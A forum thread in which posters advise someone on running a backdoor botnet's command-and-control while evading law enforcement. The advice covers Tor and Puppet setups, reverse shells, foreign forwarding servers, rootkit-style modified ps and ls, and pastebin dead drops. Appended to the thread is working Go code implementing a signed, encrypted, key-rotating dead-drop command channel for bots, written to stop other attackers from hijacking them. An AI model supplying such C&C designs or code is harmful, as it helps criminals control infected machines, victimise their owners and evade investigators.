Author Topic: Using a self-written message system as C&C  (Read 909 times)


Offline tomba

Using a self-written message system as C&C
« on: January 15, 2016, 07:30:34 pm »
Hello. I am thinking about techniques for running a backdoor C&C on a server without being charged with a crime if somebody traces the backdoor's network activity too far.

One idea of mine was hosting an unsafe, self-written IRC server which has no message cooldown etc., so you can use it as a communication server for the backdoor, but it's not an illegal server. When you get caught, you only have an IRC server running as its owner, and you can say somebody abused it.

Does this seem practical?

Offline Jackal

Re: Using a self-written message system as C&C
« Reply #1 on: January 15, 2016, 11:44:23 pm »
Well, it really depends on what type of bots you are using. I think a good way to cover up a Linux botnet is to set up a Puppet master/client configuration, encrypting your traffic: set up a Puppet master and agent configuration with as many masters as you can get, use the Tor module, then change the permissions on the config file.
Now for Windows malware it's the same principle, but Puppet isn't really an option; all you can do is encrypt all the traffic, use multiple C&C servers, have a reverse shell set up, then get a few servers in Ukraine or some shit to give the feds a hard time.
Now these servers are simply another layer of anonymity, because you set up iptables rules to forward all communications of that type to the C&C servers. Additionally, for the Puppet idea, get some modified ls and ps commands; that's a common rootkit tactic. But those are my ideas; if you want more, just hit me up.

Offline Jackal

Re: Using a self-written message system as C&C
« Reply #2 on: January 15, 2016, 11:53:24 pm »
IRC botnets are so 1990s, and it's asking to get caught; shit, all the good botnets are using SOAP nowadays anyway.

Offline n01xxv

Re: Using a self-written message system as C&C
« Reply #3 on: January 16, 2016, 02:11:44 am »
Some things:
  • Do you think that the police will not seize your server and discover that your IRC server is in fact a C&C?
  • Like Jackal says, IRC botnets are so old :)
  • Try to use TOR...
"Which came first, the bug or the exploit ?"
-- blackngel - Phrack 67 - 0x08

Offline Jackal

Re: Using a self-written message system as C&C
« Reply #4 on: January 16, 2016, 03:42:52 am »
n01xxv, it depends how he's using Tor, but from a Windows malware point of view I dunno if it's the smartest idea. Sure, you can use the communication means as C&C, host and use Tor, and not get caught, and that's the easy way; but if he were targeting companies and the sysadmin ran a port scan and saw a sketchy port open on a Windows workstation where there shouldn't be any ports open, it's a fucked-up situation. Then again, you can use port 60000 or some shit so no one will notice. But I dunno, I find the whole reverse shell thing better for Windows trojans, even though it's harder to implement from a dev and sysadmin position. Still, shit should not depend solely on Tor: if Tor doesn't work because it's firewalled, you should write some error handling that will use a regular SOCKS4 proxy instead, or make a chain of transparent HTTP proxies after Tor.

Offline n01xxv

Re: Using a self-written message system as C&C
« Reply #5 on: January 16, 2016, 12:39:27 pm »
Hmm... if you build malware that communicates with a C&C, this malware will act like a client, so you don't care about port scans! And the Tor client can be configured to go through firewalls...
After that, if the target network has L7 inspection (IPS/IDS/L7 firewall), you can find some evasion techniques.
But anyway, IRC is too easy to detect.

Offline Jackal

Re: Using a self-written message system as C&C
« Reply #6 on: January 16, 2016, 09:56:25 pm »
That's true, but we have to be specific here. What bothers me in the corporate world is that, assuming they have a well-configured ASA, a lot of the evasion techniques in the famous paper "Insertion, Evasion, and Denial of Service" won't work so well. But if you set up some solid key management for your command and control traffic and do the error handling technique I put above, it can work well. I also think he should educate himself on Windows and Linux kernel internals before he attempts it. I prefer the reverse connection approach in terms of sheer stealth (most malware authors would agree), and chances are law enforcement in many Eastern European countries won't exactly collaborate well with US law enforcement (they are forwarding servers either way).

The main issue I'd have with the general idea is self-encryption and decryption, which is a major concern for any competent malware author. Why? Because we are going to have a list of legitimate C&C servers, and any asshole analyst can simply run the malware dynamically, see where the traffic is going and put it on a domain blacklist for the malware, so you should constantly expand your C&C servers and update infected hosts with said lists.

The main problem I have with the whole Tor idea, using it as a service on the infected host, is that another blackhat who is skilled with reversing can find such a thing out, take advantage of the backdoor present and simply write a script to send commands to that port. Why? Because you can't set up a proper filter for C&C when Tor is in the equation and it's running as a service. Sure, people can do that with the Linux idea I posted, but that thing is a beta idea for me. Sorry for my heatedness on the subject; I don't come from these kinds of places, I usually hang out on Hell, Antichat and exploit.in, so my posts will run loose on the ethics.

So really, I don't think Tor would be a good idea if you don't want your malware to be used as a backdoor for others, unless you are using very specific relays or a regular SOCKS4 proxy chain.
« Last Edit: January 16, 2016, 10:39:57 pm by ande »

Offline riptorrent

Re: Using a self-written message system as C&C
« Reply #7 on: January 23, 2016, 05:28:04 pm »
There was a guy with a proof of concept years ago using various social media messages; for instance, the color of a profile picture could be an alias for a command, etc. He had implemented it in Ruby, though. I can't remember the URL or the author, but I believe it was found to be used in the wild as well. The way IoT is catching on, I would say one could hide out in some of that traffic. There are so many ways to earn money besides being a bot herder, though. Be legit.

Offline Le Freak

Re: Using a self-written message system as C&C
« Reply #8 on: January 26, 2016, 09:48:41 pm »
Just an idea: post encrypted instructions for your bots plus a unique search phrase to various pastebins. The bots google for the search phrase, parse the results and decrypt the instructions. Change the decryption password and search phrase every time (include them in the instructions). For example, Google usually indexes pastebin.com in 5-10 minutes. It is free, there is no need for hosting and, theoretically, it is bulletproof.
« Last Edit: January 26, 2016, 09:49:49 pm by Le Freak »
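The dead-drop scheme in Le Freak's post above, taken together with Jackal's objection in reply #6 that anyone who reverses a sample can send the bots commands of their own, as an added example in Go that is not from this thread or any of its posters: the operator encrypts each round's instruction under the current key, signs the ciphertext with an Ed25519 key whose public half the bots carry, and puts the next search tag and key inside the payload. The paste body layout (`<tag> <base64 blob>`), the `zq` tag prefix and the function names are assumptions of this example; the "search results" are a constructed slice of strings and no network is touched.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
)

// Instruction is one round's payload: the command plus the search tag and
// key the bots must switch to for the next round (Le Freak's rotation).
type Instruction struct {
	Command string `json:"cmd"`
	NextTag string `json:"next_tag"`
	NextKey []byte `json:"next_key"`
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// NewRound returns a random 256-bit key and a random, searchable tag.
func NewRound() ([]byte, string, error) {
	buf := make([]byte, 40)
	if _, err := rand.Read(buf); err != nil {
		return nil, "", err
	}
	return buf[:32], "zq" + base64.RawURLEncoding.EncodeToString(buf[32:]), nil
}

// Publish is the operator side: AES-256-GCM under the round key with the tag
// as associated data, then an Ed25519 signature over the ciphertext. Without
// the signature anyone holding a bot sample (and so the current key and tag)
// could post instructions of their own. Assumed paste layout: "<tag> <blob>".
func Publish(priv ed25519.PrivateKey, key []byte, tag string, instr Instruction) (string, error) {
	plain, err := json.Marshal(instr)
	if err != nil {
		return "", err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return "", err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return "", err
	}
	ct := gcm.Seal(nonce, nonce, plain, []byte(tag))
	return tag + " " + base64.StdEncoding.EncodeToString(append(ed25519.Sign(priv, ct), ct...)), nil
}

// Resolve is the bot side. hits stands in for the search results for tag;
// the first blob that verifies and decrypts wins, and decoys, forgeries and
// stale rounds are skipped.
func Resolve(pub ed25519.PublicKey, key []byte, tag string, hits []string) (Instruction, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return Instruction{}, err
	}
	for _, body := range hits {
		if !strings.HasPrefix(body, tag+" ") {
			continue // search-engine noise that merely mentions the tag
		}
		raw, err := base64.StdEncoding.DecodeString(strings.TrimPrefix(body, tag+" "))
		if err != nil || len(raw) < ed25519.SignatureSize+gcm.NonceSize() {
			continue
		}
		sig, ct := raw[:ed25519.SignatureSize], raw[ed25519.SignatureSize:]
		if !ed25519.Verify(pub, ct, sig) {
			continue // forged, or somebody else's post reusing the tag
		}
		plain, err := gcm.Open(nil, ct[:gcm.NonceSize()], ct[gcm.NonceSize():], []byte(tag))
		if err != nil {
			continue // wrong round key or tampered ciphertext
		}
		var instr Instruction
		if json.Unmarshal(plain, &instr) == nil {
			return instr, nil
		}
	}
	return Instruction{}, fmt.Errorf("no authentic instruction for tag %s", tag)
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	key, tag, _ := NewRound()
	body, _ := Publish(priv, key, tag, Instruction{Command: "sleep", NextTag: "zq-next"})
	instr, err := Resolve(pub, key, tag, []string{"unrelated paste mentioning " + tag, body})
	fmt.Println(instr.Command, err) // sleep <nil>
}
```

What the signature buys is narrow: a paste posted by someone who only holds the sample's key and tag is rejected, so the hijack Jackal describes needs the operator's private key. It does nothing against the analyst n01xxv and Jackal both mention: whoever runs the sample still recovers the public key, the current tag and the current key, can watch every future drop, and can ask the paste sites to pull them; a bot that misses one round loses the chain for good; and every infected host issuing the same odd search phrase is itself a signal a network defender can alert on, so "bulletproof" is a stretch.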